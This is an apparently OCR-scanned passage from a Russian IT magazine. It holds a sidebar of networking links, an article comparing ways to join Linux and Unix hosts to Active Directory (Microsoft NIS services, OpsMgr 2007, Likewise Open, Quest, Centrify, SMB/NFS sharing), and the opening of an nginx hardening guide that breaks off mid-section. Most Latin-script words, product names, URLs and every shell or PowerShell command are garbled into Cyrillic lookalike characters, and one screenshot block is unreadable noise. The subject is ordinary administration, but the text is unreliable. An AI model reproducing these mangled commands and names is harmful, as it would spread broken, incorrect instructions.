Зузгетз и Дитрег ИеЦлюгкз настоятельно рекомендуют их 
использовать .ц-ц 




> ѵѵагпіпд 

Некоторые старые 
версии 105 не под- 
держи в а ют ко м а н ду 
ісНерс. 




> іпіо 

• С помощью 
программы Раскеі 
ТгасеН можно 
строить целые сети 
между виртуальными 
офисами. 

• В РаскеИгасеН до- 
ступны инструменты 
рисования, кото- 
рые помогут лучше 
представить сеть на 
карте. Так, например, 
отдельные элементы 
или группы можно 
раскрасить разными 
цветами. 




НТТР://ѴѴѴШ 

■ Г 

> Ііпкз 

• Сайт проекта 
Рѵпадеп — сіупадеп. 
огд 

• Отличные видеору- 
ководства по работе с 
Рупатірзи Рупадеп 

— ЫіпсІЬод.пеІ 
•Характеристики 105 
устройств Сізсо — 
ІюоІз.сізсо.сот/ІТРІТ/ 
СГІМ/РізраІсЬ 

• Списокрепози- 
ториевдля 0Ы53 

— дрі.сосіе.сіе/озѵѵікі/ 
ОрІсосІесІеАрІ 

• Сайт проекта 
УѴігезЬагк — 
ѵѵігезЬагк.огд 

• Некоторое представ- 
ление о командах 105 
м ожн о п ол уч ить п о а д- 
ресу: уѵѵѵѵѵ.ореппеТги/ 
сІосз/ВЦЗ/сізсо Ьазіс 
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■ ■ Сергей «дгіпсіег» Яремчук дгіпгіеггазупаск.ги, Мартин «игЬап.ргапкзіег» Пранкевич тагііпИзупаск.ги 



В одной упряжке 

КАК ПОДРУЖИТЬ ѴШ00ѴѴ5 И *ЫІХХОСТЫ В ЛОКАЛЬНОЙ СЕТИ 

Сегодня гетерогенные сети не являются чем-то необычным: среди 
ѴѴіпсІоѵѵз-компьютеров обязательно найдется парочка *піх-серверов 
и рабочих станций, которые работают со специфическим ПО или вы- 
полняют специализированные задачи. Но наличие разнотипных ОС 
усложняет администрирование, ведь приходится отслеживать их сос- 
тояние, синхронизировать учетные данные, права и многое другое. 

В статье рассмотрим, как можно заставить ѴѴіп 6 оѵѵз и *піх-хосты рабо- 
тать в едином тандеме. 



ОБЗОР ДОСТУПНЫХТЕХНОЛОГИЙ 

Управление большим количеством разно- 
шерстных систем — дело весьма непростое, 
нужно контролировать их работоспо- 
собность и актуальность ПО, раздавать 
привилегии пользователям, отключать 
ненужные учетные записи, мониторить про- 
изводительность и доступность системных 
ресурсов. Проблема синхронизации учетных 
записей и политик особенно остра. Если 
выполнять все настройки на каждой сис- 
теме по отдельности, это займет не только 
больше времени, но и увеличит количество 
ошибок. Внедрив систему единой реги- 
страции (зіп^іе 5І§п-оп, 550), мы получим 
возможность устанавливать все разрешения 
централизованно. Пользователям же не 
нужно будет каждый раз вводить логин и 
пароль при подключении к тому или иному 
ресурсу: файловому, прокси-серверу и т.д. С 
точки зрения безопасности это тоже плюс, 
так как все политики паролей наследуются 
из одной базы (например, Асгіѵе Бігесгогу), а 
пользователь также меняет пароль один раз 
и в одном месте. 

Если администратор знаком с *піх-систе- 
мами, то, скорее всего, он выберет один из 
двух «традиционных» путей. Первый вари- 
ант — это использование сервера 5атЬа 
(ѵѵіпЪіпсІ) и КегЬегоз. Для интеграции с АБ 
это более «правильный» способ, поэтому 
его рекомендуют разработчики многих 
Ореп5оигсе-проектов (например, 5^шс1). 
Причем 5атЬа-сервер в таком случае легко 
сможет заменить контроллер домена. Вто- 
рой заключается в получении информации 
об учетных записях при помощи ЬБАР-сер- 



виса. Это универсальный способ, так как 
позволяет работать с любым доступным 
ЬБАР-сервером и необязательно доменом 
АБ. Оба варианта легко реализуются при 
помощи Ореп5оигсе-компонентов, то есть 
не требуют финансовых вложений в покупку 
софта. Минус — необходим некоторый опыт 
в настройке *піх-систем. Подобные схемы 
уже рассматривались на страницах ] [, 
поэтому далее познакомимся с альтернатив- 
ными реализациями, ориентированными, в 
первую очередь, на ѴѴіпсіоѵѵз-специалистов. 

СЛУЖБА УПРАВЛЕНИЯ 
ИДЕНТИФИКАЦИЕЙ ІЖІХ 

В Місгозоіт понимают необходимость 
наличия удобных инструментов, позво- 
ляющих управлять различными системами 
в гетерогенной сети. И нужные разработ- 
ки ведутся уже не один год. В результате 
сегодня по дефолту в состав ОС (с ѴѴіп2кЗК2) 
входит Служба управления идентификацией 
ІШІХ (МісгозоН 5егѵег іюг N15, АБ Ібепту 
Мапа^етепі: іог Бпіх), являющаяся под- 
компонентом роли контроллера домена. В 
ѴѴіп2к8 установить ее можно обычным обра- 
зом в Диспетчере сервера или при помощи 
консоли. Например, используя командлет 
Роѵ\гег5Ье11: 

Р8> ІтрогБ-МосІиІе Зегѵегтападег 

Р8> АсІсІ-МіпсІомзРеаЦиге АББЗ- 

ІйепБіБу-МдтЦ -гезБагБ 

Все дальнейшие настройки в ѴѴіпсіоѵѵз про- 
изводятся при помощи мастеров, поэтому 
проблем здесь обычно не возникает. 



Однако подключения к АБ фактически не 
происходит, разработка М5 обеспечивает 
лишь аутентификацию пользователя, не 
более. Все дело в том, что в процессе уста- 
новки создается отдельный домен службы 
N15 (№гѵ\гогк ІпГогтаіііоп 5егѵісе) с таким же 
именем, как и домен АБ, в котором админи- 
стратор и выполняет настройки, подклю- 
чая учетные записи. Пользователи будут 
использовать для входа один и тот же пароль 
в ѴѴіпсІоѵѵз и * піх. В параметрах учетных за- 
писей АБ появляются *піх'овские ІЛБ и СІБ. 
Главный минус такого решения заключается 
в том, что сервер N15 — это довольно старый 
и не отвечающий сегодняшним реалиям 
стандарт с весьма скромным количеством 
хранимых атрибутов (логин, пароль) . 

УПРАВЛЕНИЕ ПРИ ПОМОЩИ БСОМ 2007 

Но это еще не все, что предлагают нам 
дядьки из Місгозоіт. Один из членов семейст- 
ва Зузгет Сепнег (о 5ССМ 2007 читай в 
статье «Начальник сети», опубликованной 
в ] [ 08.2009) — Зузгет Сепнег Орегагіопз 
Мапа§ег2007 (ОрзМ^г 2007, тісгозоіг.сот/ 
зузГетсепЕег/еп/из/орегайопз-тапа^ег. 
азрх) — предназначен для управления и мо- 
ниторинга приложений, сервисов, серверов 
в гетерогенной среде. Программа призвана 
объединить информацию о функционирова- 
нии различных компонентов ІТ-инфраструк- 
туры, обеспечивая ее обобщенное представ- 
ление в единой консоли. 

Изначально ОрзМ^г 2007 был рассчитан на 
продукты М5, но в 2008 году стали доступ- 
ны расширения Сгозз РІаніЪгт ЕхГепзіопз 
( Ыо^з.тзсіп.сот/ЗСХрІаі:) , которые дают 
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возможность мониторить состояние и производительность, а также 
управлять Ілпихх86/х64 (официально — КесЩаЦ 51І5Е), НР-ИХ, 
АІХи Зоіагіз 5РАКС/х86. СРЕ построены с использованием откры- 
тых стандартов: ѴѴеЪ Зегѵісез Іог Мапа^етепі: (\Ѵ5_Мапа§етепі:), 
ОрепРе^азш и 55Н. Последний обеспечивает авторизацию и безо- 
пасную связь между сервером и клиентами. Кроме того, посредст- 
вом 55Н осуществляется развертывание агентов на удаленных 
системах и управление сервисами. Используя ОрзМ^г, *піх-админ 
вдобавок ко всему получает удобную систему отчетов. 

На сегодня стадия тестирования завершена, продукт можно свобод- 
но скачать по ссылкам на странице ТесІйЧеі: ( щсЬпен.тісгозоіт.сот/ 
еп-ш/ зузиетсепЕег/ зсх/ бе^аиК.азрх ) . 

После установки набора расширений и добавления *піх-систем 
в список ОрзМ^г можно управлять не только настройками ОС и 
некоторых популярных приложений (АрасЬе, МуЗС^Ь, зузіо^), но и 
ресурсами: дисками, сетью, СРИ. Агенты устанавливаются цент- 
рализованно из консоли управления ОрзМ^г при помощи мастера 
«Сотрілег апсі Оеѵісе Мапа^етепі: ѴѴігагсІ - Шіх/Ілпих Оізсоѵегу 
ѴѴігагсі» или вручную, используя пакетный менеджер дистрибутива. 
После чего на клиентской стороне стартуют два демона — зсх-сітсі и 
зсх-ѵѵзтапсі, которые выполняют основную работу по сбору данных и 
запуску команд. 

СТОРОННИЕ РАЗРАБОТКИ 

На рынке доступны решения и от сторонних компаний. Среди самых 
известных: Сеппііу Оігесі:Сопі:го1/Сепі:гі1у ПігесиМапа^е, Ьікеѵѵізе 
Етегргізе/Ілкеѵѵізе Ореп, (^иезііАиіІіепгісагіоп Зегѵісез (ранее Ѵіпііеіа 
АиНіепгісаіііоп Зегѵісез) и Оиезі: Опе Иепіііу Зоіийоп. Все перечислен- 
ные продукты обеспечивают аутентификацию пользователей *піх 
в службе Асіііѵе ОігесШгу. К плюсам таких программ можно отнести 
простое развертывание и настройку, производимую, как правило, 
посредством графического интерфейса. Это очень удобно, ведь 
админу-виндузятнику не нужно вникать в особенности *піх-сис- 
тем, разбираться в конфигах и так далее. Для пользователя *піх и 
ѴѴіпсіоѵѵз разницы в работе нет — после аутентификации он получает 
все права на доступ к ресурсам, которые делегированы ему в АВ. 
Минус — коммерческие реализации стоят денег, а значит, их 



внедрение придется хорошо обдумать и обосновать начальству. 

Хотя стоимость лицензии на один компьютер все равно получается 
меньше, чем покупать ѴѴіпсіоѵѵз. Поэтому выбрав *піх + один из про- 
дуктов, о которых рассказано далее в статье, можно немного сэконо- 
мить (не только на лицензировании ОС, но и на покупке антивирей 
и прочего сопутствующего софта) . 

Для выполнения своей функции сторонние решения обычно исполь- 
зуют расширение схемы АБ, а на клиентские системы устанавливает- 
ся агент, который и отвечает за аутентификацию и взаимодействие 
с КД. Задача несколько усложняется тем, что в *піх нет единого 
стандарта присвоения ІЛБ и СГО учетным записям пользователей и 
групп, поэтому в разных системах и дистрибутивах соответствующие 
цифры не совпадают. Как ты понимаешь, без ручной доводки здесь не 
обойтись, даже при наличии мощных средств автоматизации. 
Представленные приложения схожи по задачам, но имеют свои осо- 
бенности. Чтобы тебе было легче подобрать для своей сети наиболее 
подходящее решение, мы подготовили этот мини-обзор. 

ЫКЕѴѴІ5Е0РЕЫ 

РАЗРАБОТЧИК: ЫКЕѴѴІ5Е50РТѴѴАКЕ 
ѴѴЕВ: ЫКЕѴѴІ5Е.С0М, ЫКЕѴѴІ5Е0РЕЫ.0КС 

ОС: ІЛШХ 2.4/2. 6 (Х86/Х64) КРМ&РЕВ ВА5Е0, РРЕЕВ5Б Х86 р 50І.АШ5 8+ 
(Х86/Х64, 5РАКС), 05 X 1 0.4+ р НР-ЦХ РА-ВІ5С/ІА64 р АІХ 

Продукт распространяется в двух версиях: бесплатной (Ореп) и 
коммерческой (Епііегргізе) . Агент, устанавливаемый на клиентских 
компьютерах, обеспечивает 550-аутентификацию пользователя 
посредством КегЪегоз 5 или ШЪМ. Агент используется для аутенти- 
фикации и получения доступа к системам и ресурсам. Компьютер с 
установленным Ш становится полноценным членом домена. Под- 
держиваются доменные политики паролей. Реквизиты кэшируются 
на клиентском компьютере, что позволяет работать без доступа 
к КД. Единый пароль работает и для других приложений (таких, 
например, как Ореп55Н и Рину). Для настройки подключения к АБ 
на клиентской стороне может использоваться графический интер- 
фейс, который устанавливается отдельно. Список поддерживаемых 
систем и платформ насчитывает до 180 наименований. 
Дополнительные функции, доступные в версии Епііегргізе, поз- 
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Г рафический интерфейс Ыкеѵѵіее 
О реп 

воляют управлять тождеством *піх-иден- 
тификаторов в АБ, применять групповые 
политики АБ для *піх-систем, в том числе 
и управлять настройками рабочего стола 



ОЛ-— - 

Установка Ыкеѵѵізе Ореп при по- 
мощи скрипта 

Споте ССопі 7 , политиками ЗЕІлпих, 
АррАгтог и зибо, использовать сценарии 
и настройку в конфигурационных файлах. 
Чтобы получить идентификатор пользо- 
вателя и группы из АБ, следует устано- 
вить на рабочем месте администратора 
дополнительный модуль ІЛБ-СІБ (Ілкеѵѵізе 
Мапа^етепі; Сопзоіе), который обеспечит 
нужное сопоставление. Кроме проче- 
го, версия Епиегргізе снабжена удобной 
системой отчетов, позволяющей собрать 



В ѴѴіпгіоѵѵзустановка 0А5 произ- 
водится при помощи графическо- 
го меню 

и проанализировать текущие установки 
систем. 

Инсталляция приложения не должна выз- 
вать сложностей. Прекомпилированный 
пакет Ш доступен в некоторых популяр- 
ных дистрибутивах, например. Кеб Наі 
Етегргізе Ілпих/РесІога/СепЮЗ, ІЛэипш, 
орепЗБЗЕ. В ЦЬипШ набираем: 

$ зисіо арк-дек іпзкаіі 1ікеѵ\Азе-ореп 
Іікемізе-ореп-диі 



Настройка обмена данными между 
ѴѴІП2К8К2 и *піх 



При наличии в сети серверов и рабочих станций ѴѴіги1оі/ѵ$ 
и *піх необходимо настроить обмен данными между ними. 
Для этих целей обычно используют один из двух протоко- 
лов: 8МВ или ЫР8. Первый является штатным для ѴѴіпсІо\ѵ8, 
второй — для *піх. Другие протоколы вроде РТР, НТТР, 88Н 
и т.д. менее удобны для обмена файлами в локалке. Монти- 
ровать в Ілпих сетевой ресурс можно при условии наличия 
модулей ядра, обеспечивающих поддержку файловых сис- 
тем 8МВР8 или СІР8, и утилиты втЪсІіепІ:. В ШшпШ для этого 
следует установить пакет 8МВР8, в СепЮ8 — СІР8. 
Просмотреть список доступных ресурсов можно при помо- 
щи команды: 

$ зтЪсИегП -Б шіпзузіет 

Некоторые файловые менеджеры *піх (Копциегог, 

N301:1108) поддерживают специальный протокол — 8тЬ: // 
ѵѵіпзувіет/. 

Чтобы смонтировать ресурс при загрузке, прописываем в / 
еСсЛ&аЪ: 

//ѵѵіпвувіет/вііаге /тпі/ѵѵіп сіГв 08 ег,оіс 1 = 500 ,г\ѵ, 80 Ій, 08 егп 
ате=о8ег,ра88\ѵогй=ра88 о о 

Но монтировать сетевой ресурс удобнее, когда он действи- 
тельно нужен, поэтому лучше использовать апіоГв. В /еіс/ 
аиіо.тавіег добавляем описание новой точки монтирова- 
ния: 

/8тЪтоигП /еІс/аиІо.втЪ 
В файле /еІс/аиІо.зтЪ описываем ресурсы: 



і/ѵіп8у8І:ет -Гзіуре = сіГ8,гѵѵ,порегт,и8егпате =и8ег,ра88\ѵогсІ 
=ра88 ://\ѵіп8у8І:ет/8Ііаге 

И перезапускаем сервис командой «зегѵісе аиІоГз гевіагі». 

В *піх подключение по протоколу 8МВ организуется средст- 
вами сервера 8атЪа Г\ѵллгѵѵ.8атЬа.ог^) . Его настройка про- 
изводится ручной правкой конфигурационного файла /еіс/ 
зтЪ.сопГ, хотя в современных дистрибутивах уже доступ- 
ны утилиты с графическим интерфейсом, позволяющие 
настроить сетевой ресурс буквально парой щелчков мышки 
(№иШи8, Копциегог, 8 тЬ 4 к, ХЗМВготлгеег). 

Начиная с \Ѵіп 2 кзК 2 , в состав ОС входит компонент МісгозоН 
8 егѵісе 8 Гог № 1 ѵѵогк Рііе 8 у 8 Іет (ранее доступен в пакете 
ѴѴіпс1оі/ѵ8 8 егѵісе 8 Гог Ііпіх) . В \Ѵіп 2 к 8 он является частью роли 
Рііе 8 егѵег. Включает клиентскую часть для подключения к 
ОТ 8 -каталогам в сети и серверную часть — для предоставле- 
ния общего доступа. Установить ЫР 8 -сервер можно командой: 

> 8егѵегтапа§егстс1 -іпзіаіі Р 8 -ОТ 8 - 8 егѵісе 8 

После установки в свойствах сетевой папки появится пункт 
ОТ 8 8 Ьагіп§, в котором производятся основные установки. 
Настройки ОТ 8 сервера в *піх расписаны достаточно под- 
робно (например, см. пошаговое руководство ілгѵхгѵѵ.орепЬзсІ. 
ги / с1ос8 / 8 Іер 8 /пГ 8 . Ьіті) . Определяем в /е 1 с/ехрог 1:8 ресурсы 
для экспорта и монтируем в ѴѴіпсІоі/ѵ 8 сетевой ресурс как 
локальный диск: 

> тоип 1 \\і 92 .і 68 .і.і 2 \ 8 Ііаге 2 : 

Команда «зЬоѵѵтоипІ: -е ІР_вегѵег» выведет список доступ- 
ных ресурсов. 
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Скриптустановки 0А5 



Просмотр списка ѴѴіпсІоѵѵз ресурсов из 
Ыпих 



На офсайте выложены скрипты установки для дистрибу- 
тивов, использующих КРМ и БЕВ. Например, в ИЪипШ 
установка при помощи такого пакета проста: 

$ зисіо сктосі +х . /ЬікемізеІйепкіДуЗегѵісеОреп- 

5.3.0. 7766-1іпих-атсіб4-(ЗеЬ . зк 

$ зисіо зк . /ЬікемізеІсІепЦіЦуЗегѵісеОреп- 

5.3.0 . 77 66-1іпих-атс164-(іеЪ . зк 

И ОШ: 

$ зисіо сктосі +х . /ЬікемізеБотаіпЦоіпСиі- 

5.3.0. 7766-1іпих-х8б_б4-сіеЬ-іпзка11ег 

$ зисіо зк ./Ьікеѵ7ІзеБотаіпЦоіпСиі-5.3.0.77 66- 
1іпих-х8б_64-сіеЬ-іпзка11ег 

Для чистоты операции систему лучше перезагрузить. 
Возможна также сборка из исходных текстов, что 
позволяет использовать Ш-администраторам слаки, 
генту и другие системы. После установки в *піх-системе 
будет запущен ряд сервисов: Ізаззсі (аутентификация), 
пеііо^опб (поиск КД), бсегрсб (КРС), Іѵѵіосі (работа с 
5МВ) и еѵепіііо^б (сбор событий) . Создаем в домене 
отдельную ОБ, в которую будут входить: *піх-пользова- 
тели, группа (она должна быть установлена как ргітагу) 
и учетные записи. Затем подключаем компьютер к 
домену: 

$ /орк/Іікетлизе/Ъіп/сіотаіпзоіп-сІі зоіп 
зупаск.ги асітіп 

Ключ '-ргеѵіеѵу' позволяет просмотреть операции, 
выполняемые скриптом. В процессе подключения 
используем учетную запись администратора домена; 
если будут проблемы, попробуй указать имя в виде 
БОМАШХХизегпате. 

01ІЕ5Т АІІТНЕМТІСАТІОЫ 5ЕКѴІСЕ5 
РАЗРАБОТЧИК: (ШЕ5Т 50РТѴѴАКЕ 
ѴѴЕВ: СШЕ5Т-50РТѴѴАКЕ.Ки 

ОС: ЫЫиХХ86/Х64 р 50І.АКІ5 Х86/Х64/5РАВС, АІХ Р НР-ЦХ р 
МАО 05 Х р НР-ЦХ ІА64/РА-КІ5С, ІВМ АІХ Х86/Х64, 501 ІШХ Р 
ТКІІ64 Р ХЕЫ5ЕРѴЕР, ѴМѴѴАКЕ Е5Х 5ЕКѴЕК 

Решение (^А5 использует запатентованную техноло- 
гию, расширяющую схему АБ, позволяя *піх-системам 
стать полноценными членами домена. Поддержива- 



ется централизованное управление, СРО, 550-аутен- 
тификация пользователей не-ѴѴіпсіоѵѵз ОС и неко- 
торых приложений, использующих КегЬегоз и ЬБАР. 
Причем (^А5 поддерживает алгоритм шифрования 
АКС4 с 128-битным ключом, который более устойчив, 
чем стандартный 56-битный БЕ5, используемый в 
КегЬегоз. 

При этом (^А5 позволяет пользователям *піх применять 
при регистрации в системе не только связку логин/ 
пароль, но и смарт-карту. Предусмотрена возможность 
расширения групповых политик АБ, в которые можно 
добавлять сценарии, файлы, ссылки, сообщение дня, 
системный журнал. В документации расписано, как 
самостоятельно создать политику под любую ситуацию. 
При наличии №5-сервиса возможна миграция или хра- 
нение данных N15 в АБ. Установочные файлы распро- 
страняются в виде архива или 150-образа (по составу 
они одинаковы) . 

Сам процесс инсталляции прост, перед запуском уста- 
новочного скрипта іпзіаІІ.зЬ следует вызвать скрипт 
ргеШ^ЬсзЬ с именем домена в качестве аргумента. 
Скрипт проверит систему на совместимость с (^А5 
и возможность подключения к домену. Собственно 
процесс установки на * піх производится при помо- 
щи текстового мастера и занимает пару минут. Все 
инсталлируемые пакеты в формате КРМ/БЕВ нахо- 
дятся в подкаталоге сііепі, в 5БК — исходные тексты. 
На последнем шаге установки клиента происходит 
подключение к домену. Демон ѵазсі обеспечивает 
аутентификацию и кэширует полученные данные, 
предоставляя доступ к требуемым ресурсам. Для уп- 
равления работой ѵазсі используется утилита команд- 
ной строки ѵащооі. 

В ѴѴіпсіоѵуз установка производится при помощи 
понятного графического интерфейса, в меню ко- 
торого имеются ссылки на нужные приложения и 
руководства пользователя. Кроме этого, для версий 
ниже ѴѴіп2кЗК2, где нет схем для АБ, позволяющих 
работать с Бпіх-атрибутами (ШБ, СІБ, оболочка по 
умолчанию, домашний каталог), следует запустить 
мастер 5сЬета ѴѴігагсІ, исполняемый файл которого 
находится в подкаталоге 5сЬета. При изменении 
схемы лучше перестраховаться и создать резервную 
копию, всякое ведь бывает. 

Примечание: добавлять учетные записи для *піх-систем 
следует в отдельном ОБ. 




> ѵѵагпіпд 

Чтобы без проблем 
подключить *піх к 
АО, следует на *піх- 
клиентах прописать 
в качестве 0Ы5 и І\ІТР 
серверов контроллер 
домена. 




> іпіо 



0 5ССМ 2007 читай 
в статье «Начальник 
сети», опубликован- 
ной в ][ 08.2009. 




НТТР://ѴѴѴШ 



— "і — і~ 

> Ііпкз 

• Страница проекта 
М іеговой Бузует 
СепІегОрегабопв 
Мападег2007 : 
тісговой.сот/ 
вѵвіетсепіег/еп/ив/ 
орегабопв-тападег. 
аврх 



• БлогОрвМдг2007 
С го вз Ріа Йо гт 
Ехіепвіопв: Ыодв. 
твбп.сот/ЗСХрІаІ:. 
іесЬпеСтісговоЙ.сот/ 
еп-ив/вѵвіетсепіег/ 
всх/сІеІаиКаврх 

• Информация о ЫЕ5 
в 1_іпих: [іпих-пів.огд 
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Сбшне сведения о клиенте для №5 

К/інвні для Н?5 пошопяві ХОМПЬЩі *Р»Чр р^бфтгошдчм ли упр#рл*ыиен МЛп пйдучяТ* ДТСіуП к С1ГР09Р4М 
0МѵнА Ріір Вугіил), 

ГЬапысівателн клиента дли ИРё гкшучают доступ к каталогам: (наіыаавнші общими папкам^ на компьютерах 
С р^ОТМШінН ПрОфіннивяч &$0С«ММИІМ НГ5-ВДДОДО Пур*« ЛОДйЛЩМеНий 9ТАч каталоги К СвОнн 
кпмпью і ѵрли. Дпя пштыпатіішй доступ к флйллм ■ подЕлючинных: оБицмх гипсам МГЗ ничем к» отлнитёя 
от дотувд к лок*т?мй*1 файлам. 



КонфОпы-іЫ)л спѵісой: настройка йлиемта дпя МРй 

Дли б^тЮЛкаиия ОВДуайщИИ зддаи Тр4буі6ТСй При риштам йдмпнлі: ТріТОрл кОмАьДОЗД# С кпмг-мТ*м дпй №& 

и, возиотчо, на другим серверах сити. Д опалин тельные сведемъ □ настройке содержатся и рагделе Советы 
и реканандацин па рабе іа с игиівнтан для 

^ І^т^айкд^с^поетддлвння учетныя адписей Клиент дл п НГ5 мркеі швлмать дапое і-двленне уиатши 
іапнсей прп&зовамілий >гпйе^ “ иМЬх" чт д^ччнт служб А^^гуе №к:*!*у, сервера сслоставлення и»*н 
попькелтелей или ні ойонк пик нсточнжсе. Б ИкгріоП Ѵя’іп ^аччгі &ѳгѵег тнтсл служба управления 
вдентнф»**ацней дл-я ШІХ К которая расширяет с чему домятых служб ДсТіѵе Оігесіогу „ включает 
меоЬходмные дамные об учетным ѵаписяк пнлысша гелей УГЛИ и пез-воляе* управлять этими данными 

и нас і ройка параметров служб для ПОСЛ* ИрГо чек выбраны дднвивдв службы №іѵй О^еСІсгу иЛн 

сшрлтр сіэпрстлп прмип нн«н пшъэлжвтялей, нрр&ащднмр нлртррнт» службы- для №5 и* Ці^рос 

ссотве і с теуошего нсточижа. Эта настройка влияет на клиент для МГ5 и на сервер для №В. 

гі Под* л дч а гчна сгіЬц и я па пак К Р 5 . Доступ к общим папкам №8 можно получит» путем подключения нк с 
пспдлырр4нн«ц 6у>вы диска ют с пОмОшьч УМС х ПуІ*й. 



-1І 
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ЕГі Я : 34Ж & 



Консольслужбы ЫРБ вѴѴіп2к8В2 



СЕЫТтРУ ОШЕСТСОЫТКОЬ 
РАЗРАБОТЧИК: СЕИТКІРУ СОКРОКАТІОН 
ѴУЕВ: СЕЫТРІРУ.СОМ 
ОС: иЫиХХ86/Х64 р МАО 05 Х р 50І.АКІ5/ 
0РЕЫ50І.АКІ5 Х86/Х64/5РАВС, ІВМ АІХ,56І ІШХ Р 
НР-ЦХ, ѴМѴУАКЕ Е5Х 5ЕКѴЕК 
Сепггііу Бігесі:Сопі:го1 обеспечивает *піх- 
системам аутентификацию, управление 
контролем доступа и реализацию группо- 
вых политик. Как и в прочих решениях, на 
клиентских компьютерах устанавливается 
специальный агент, который отвечает за 
взаимодействие с АБ. Полученные данные 
кэшируются, позволяя работать в авто- 
номном режиме без доступа к КД. Агенты 
созданы для большого количества систем 
и версий ОС, разработчики заявляют о 
поддержке 225 дистрибутивов; полный пе- 
речень можно найти по адресу сепітііѴ.сот/ 
бігесгсопггоі . 

Непосредственное управление осуществ- 
ляется при помощи Сепггііу БігесгМапа^е 
— набора ѴѴіпбоѵѵз утилит и веб-консо- 
ли. Кроме этого, в свойствах объекта в 
консоли «Асгіѵе Бігесгогу- пользователи и 
компьютеры» появляется дополнитель- 
ная вкладка Сепггііу РгоШе, где можно 



выбрать домен, просмотреть свойства 
профиля: основную группу, логин, ШБ, 
домашний каталог. Здесь обнаруживает- 
ся фишка БігесгСопГгоІ — зоны, которые 
представляют собой логические группы 
со своим уникальным набором учетных 
записей пользователей и админов, а также 
набором политик безопасности и прав 
доступа. Зоны могут создаваться по любо- 
му удобному признаку. Например, в зону 
можно включить системы в удаленном 
офисе или собрать все системы с опреде- 
ленной версией ОС. Наличие зон позволя- 
ет предельно точно контролировать права 
пользователей. Чтобы пользователь (или 
группа) получил доступ к определенным 
системам, его необходимо подключить 
в зону. При этом он может быть членом 
нескольких зон. Настроив отдельную зону 
в удаленном филиале, можно делегиро- 
вать ее управление одному из пользова- 
телей, что иногда более эффективно, чем 
администрирование из центрального 
офиса компании. Система отчетов в кон- 
соли управления позволяет просмотреть 
данные о том, кто и чем управляет в сети и 
какие права имеет. На основании отчетов 



администратор может создать рекоменда- 
ции по аудиту. 

Наличие в *піх-системах множества одно- 
типных параметров, но с разными иденти- 
фикаторами, может вызывать конфликты. 

В БігесгСопГгоІ предусмотрена специальная 
функция разрешения конфликтов, настрой- 
ки которой доступны в том числе и через 
СРО. Установка как в *піх, так и в ѴѴіпбоѵѵз 
не отличается сложностью, хотя и проис- 
ходит в текстовой консоли. В дальнейших 
настройках (создание новой зоны, настрой- 
ка *піх-идентификаторов, ргітагу-группы и 
т.д.) администратору помогают многочис- 
ленные мастера, что заметно упрощает и 
ускоряет процесс интеграции *піх-систем в 
АБ, а также уменьшает количество возмож- 
ных ошибок. 

ЗАКЛЮЧЕНИЕ 

Как видишь, ѴѴіпбоѵѵз и * піх могут спокойно 
уживаться в одной сети, работая в едином 
тандеме и, главное, не доставляя хлопот 
админу. Все описываемые решения понятны 
в установке и дальнейшей настройке, и 
обычно проблем с последующей доводкой не 
возникает, цц 
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■ ■ Евгений Зобнин іі тИзупаск-ги 



Полный 
тюнинг движка 

ДЕЛАЕМ ИЗ Ы6ІЫХ НЕПРОБИВАЕМЫЙ ѴѴЕВ-СЕРВЕР 

Выделенный ѴѴеЬ-сервер на основе пдіпх — отличный способ повыше- 
ния производительности ѴѴеЬ-сайтов. В скорости обработки статичес- 
кого контента ему просто нет равных: он легко выдерживает несколько 
тысяч одновременных соединений и может быть легко оптимизирован и 
подогнан под любую конфигурацию. Однако, выступая в качестве фронт- 
энда для Арасбе, пдіпх оказывается наиболее уязвимым местом всей 
ѴѴеЬ-инфраструктуры, поэтому безопасности пдіпх необходимо уделить 
особое внимание. 



Эта статья — своего рода ликбез, или, если хо- 
чешь, резюме всех техник повышения безопас- 
ности п^іпх. В ней не будет теории, описания 
основ настройки ѴѴеЬ-сервера и прочей воды. 
Вместо этого ты получишь исчерпывающий 
практический материал, описывающий все 
основные шаги, которые необходимо проде- 
лать для того, чтобы получить по-настоящему 
защищенный ѴѴеЪ-сервер. 

УСТАНОВКА 

Пакет п^іпх доступен в прекомпилированном 
виде для любого дистрибутив а. Однако, собрав 
сервер самостоятельно, ты сможешь сделать 
его более компактным и надежным, а также 
получишь возможность изменить строку при- 
ветствия ѴѴеЪ-сервера, чтобы отбить несмыш- 
леных скрипт-кидди. 

Измени строку приветствия 
ѴѴеЬ-сервера 

Скачай исходники п^іпх, открой файл зге/ 
Ьі;і;р/п§х_]і^Р_Ьеасіег_Ші;ег_тосіи1е.с и найди 
следующие две строки: 

зДаДіс сііаг пдх_1іДДр_зегѵег_ 
зДгіпд [] = " Зегѵег: пдіпх" СКЬР; 
зДаДіс ейаг пдх_1іДДр_зегѵег_Ди11_ 
зДгіпд [ ] = "Зегѵег: " ШШХ_ѴЕК 
СКЬР ; 

Замени их на что-то вроде этого: 

зДаДіс сЬаг пдх_ЬДДр_зегѵег_ 
зДгіпд [] = "Зегѵег: ] [ МеЪ Зегѵег" 
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СКЬР ; 

зДаДіс сЬ.аг пдх_ЬДДр_зегѵег_Ди11_ 
зДгіпд [] = "Зегѵег: ] [ ШеЬ Зегѵег" 
СКЬР ; 

Удали все неиспользуемые тобой 
пдіпх-модули 

Некоторая часть модулей п§іпх подключается 
к ѴѴеЪ-серверу прямо во время компиляции, 
и любой из них таит в себе потенциальную 
опасность. Возможно, в будущем в одном из 
них будет найдена уязвимость, и твой сервер 
окажется под угрозой. Отключив ненужные 
модули, ты сможешь значительно снизить риск 
возникновения такой ситуации. 

Выполни сборку с помощью следующих 
команд: 

# . /сопіідиге --ѵ\гіДДюиД-1іДДр_ 
аиДоіпс!ех_тос1и1е --тДДюиД-1іДДр_ 
ззі_тос1и1е 

# таке 

# таке іпзДаІІ 

Так ты получишь п^іпх с заранее отключен- 
ными (и в большинстве случаев бесполез- 
ными) модулями 551 (5егѵег 5іс1е Іпсіисіез) и 
Аіпоіпсіех. Чтобы узнать, какие модули можно 
безболезненно выбросить из ѴѴеЪ-сервера, 
запусти скрипт сопіідиге с флагом '-Ьеір'. 

ПРЕПАРИРУЕМ Ы6ІЫХ.С0ЫР 

После установки п^іпх следует настроить. На 
страницах журнала уже был материал, описы- 
вающий этот процесс, мы же будем придер- 



живаться темы статьи и поговорим о способах 
повышения безопасности сервера. 

Отключи показ версии сервера на 
всех ошибочных страницах 

Добавь в файл п§іпх.сопі строку "зегѵегдокепз 
ой 5 '. Это заставит п§іпх скрывать информацию о 
типе и версии ѴѴеЬ-сервера на страницах, генери- 
руемых в ответ на ошибочный запрос клиента. 

Настрой защиту от срыва стека 

Добавь в секцию зегѵег следующие строки: 

